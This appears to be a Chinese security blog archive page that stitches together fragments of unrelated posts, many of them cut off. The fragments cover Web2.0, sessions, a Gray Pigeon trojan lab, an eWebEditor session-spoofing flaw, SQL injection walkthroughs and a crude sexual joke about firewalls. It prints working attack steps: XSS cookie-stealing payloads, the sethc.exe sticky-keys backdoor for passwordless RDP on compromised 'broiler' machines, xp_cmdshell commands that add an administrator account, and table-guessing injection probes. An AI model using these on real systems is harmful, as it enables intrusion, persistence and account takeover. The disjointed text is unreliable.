存档
1,Web2.0时代的发展方向
2,Web2.0时代的主流攻击技术-XSS
3,XSS攻击的原理是什么
4,XSS攻击的分类
5,利用XSS漏洞能做什么
5,XSS攻击的简单实现…
一 什么是Web2.0
web1.0可理解为目前的互联网,而web2.0则是互联网不久的将来.这里通过一些简单的对比来描述web2.0.
从知识生产的角度看,WEB1.0的任务,是将以前没有放在网上的人类知识,通过商业的力量,放到网上去。WEB2.0的任务是,将这些知识,通过每个用户的浏览求知的力量,协作工作,把知识有机的组织起来 从内容产生者角度看,WEB1.0是商业公司为主体把内容往网上搬,而WEB2.0则是以用户为主,以简便随意方式,通过blog/podcasting方式把新内容往网上搬 从交互性看,WEB1.0是网站对用户为主;WEB2.0是以P2P为主
先说session
对SESSION的争论好象一直没有停止过,不过幺麽能理解SESSION的人应该占90以上。但还是讲讲,别嫌老~
有一些人赞成用SESSION,有一些人不赞成。但这个问题到底要怎么说。不妨听听我的看法,如果有错误请不要朝丢东西,金条和硬币除外。有些人应该知道我是做江湖程序的,而江湖程序做看中的就是效率,但这里不谈设计,而从一些比较实际的角度看SESSION。
首先要先说SESSION是干什么的,SESSION是可以存储针对与某一个用户的IE以及通过其当前窗口打开的任何窗口具有针对性的用户信息存储机制。为什么要这样说。看下边先研究SESSION是如何启动的,当打开IE以后浏览网站后会发出一个指令请求SESSIONID以及对各个类型数据的下载许可,如图片,声音以及FLASH。
数据实际传输内容:IE到服务器
第12次课 网马技术实验
银河学院网络安全组_ritto
------------------------
下面为本次实验的拓朴图
这台黑客用我们的真实机来充当
首先来配置系统木马,这里我们用灰鸽子来做
先配鸽子,看操作…
这里就只做鸽子局域网上线的实验.
先配置鸽子服务程序
好了,配置成功啦
先试一下在本地能不能上线
可以上线,说明我们的鸽子本身配错
接下来把鸽子配置成网马
今天给大家演示的是session欺骗漏洞:
——————————————
eWebEditor session欺骗漏洞
eWebEditor在线编辑器
这个编辑器在网上用得很多,很多大的网站和论坛或博客都是使用它来做在线编辑器的
漏洞文件:Admin_Private.asp
漏洞语句:<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
同时在admin_login.asp中
Session("eWebEditor_User") = s_Usr
Session("eWebEditor_Version") = oRs("sys_version")
Response.Redirect "admin_default.asp"
Response.End
只判断了user的值,没有对其它的值进行判断
PHP注入攻击实验全过程_ritto
ymDown站点的搭建过程
接下来就是全部演示了,不要打文字说明了,大家看清楚了啊。。。。
好了,现在我们的实验环境就搭建好啦
接下来我们来进行php注入攻击
1.检测是否有注入点
加’ 报错,并暴出了服务器文件的绝对路么,这个后面用的
D:\wwwroot\ymdown\show.php
再试 and 1=1(正常
首先,服务器上用的是私有的操作系统和数据库,所谓私有,并不是完全自己写,而是说,全部都是进行私有化改造过的,一般使用开源的操作系统和数据库进行改造,比如说操作系统使用free bsd的改,数据库使用mysql的改,网站服务器数量上百时开始实施这个工程的网站比较多,费用是很重要的一方面原因,但更重要的是安全因素。防火墙不仅昂贵,而且会严重降低效率,所以他们一般不会考虑。
改造操作系统的时候,除通信所需的一些命令文件保持原名外,很多命
你在一个聚会上看见一女生,你说用套套吧,这叫防火墙;
你在一个聚会上看见一女生,你说用薄一点套套吧,爽,她说不安全,这是包过滤防火墙;
你在一个聚会上看见一女生,你说用厚一点套套吧,安全,她说不爽,这是应用层防火墙;
你在一个聚会上看见一女生,你说用套套吧,她说流氓,边儿去!这叫物理隔离;
你在一个聚会上看见一女生,你要跟她嘿咻,她说有性病,这叫病毒;你说可以用某种药处理一下,这叫防病毒;
你在一个聚会上看见一女生,好多人也看见了她,要同时跟她搭讪,这叫DoS;
你在一个聚会上看见一女生,你跟她嘿咻,一个大夫老是在旁边看还大声喊:可能有病毒!这叫IDS;
你在一个聚会上看见一女生,你跟她嘿咻,一个大夫说为了你的安全我做中间人认真检查一下,这叫IPS;
你在一个聚会上看见一女生,你跟她嘿咻,一个大夫大声喊:可能有病毒!一个卖套套的马上给你带上套套,这叫联动;
‘><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript…
在肉鸡上执行命令
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。
扩展存储过程:
1.显示目录 exec xp_cmdshell 'dir c:\windows'
2.添加一个系统帐户 exec xp_cmdshell 'net user zm 123 /add'
3.添加到管理员 exec xp_cmdshell 'net localgroup administrators zm /add'
4.察看xp_cmdshell源代码 exec sp_helptext 'xp_cmdshell'
5.删除xp_cmdshell exec sp_dropextendedproc 'xp_cmdshell'
6.添加xp_cmdshell exec sp_addextendedproc "xp_cmdshell",'xplog70.dll'
1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表
and 0<> (select count(*) from userlist)
and 0<> (select count(username) from userlist) –猜测表里面的字段
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
安装SQL2000时出现错误的解决方法:
打开注册表编辑器,找下如下键值
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager]
将 pendingfilerenameoperations 键值删除掉
如果不行的话,将 controlset001 controlset002 下面相应的键值也都删除了即可
因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发。我只写了一句代码,就搞定了,哈,痛快。就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME不起作用了。
代码如下:
<style type="text/css" media="all" id="http://safe3.cn">
/*<![CDATA[*/
iframe{
v:expression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有 IFRAME */
}
随着计算机及网络应用的扩展,电脑信息安全所面临的危险和已造成的损失也在成倍地增长,特别是各种黑客的增多,一些个人用户也时常遭到不同手段的攻击,这不得不引起我们的重视.
对于个人用户来说,除了病毒和木马,网页中的隐形代码也开始严重地威胁着我们的安全,但大多数人却缺乏自我保护意识,对隐形代码的危害认识不够,甚至在自己不知情的情况下被别人窃取了重要资料.因为隐形代码具有比较大的隐蔽性,到目前为止,还没有什么病毒防火墙能很好地阻止隐形代码的攻击,大多数甚至根本就不能发现.所以我们更应该高度警惕网页代码中的隐形杀手.一般来说网页代码中的“隐形杀手”大致分为以下几类:
近期评论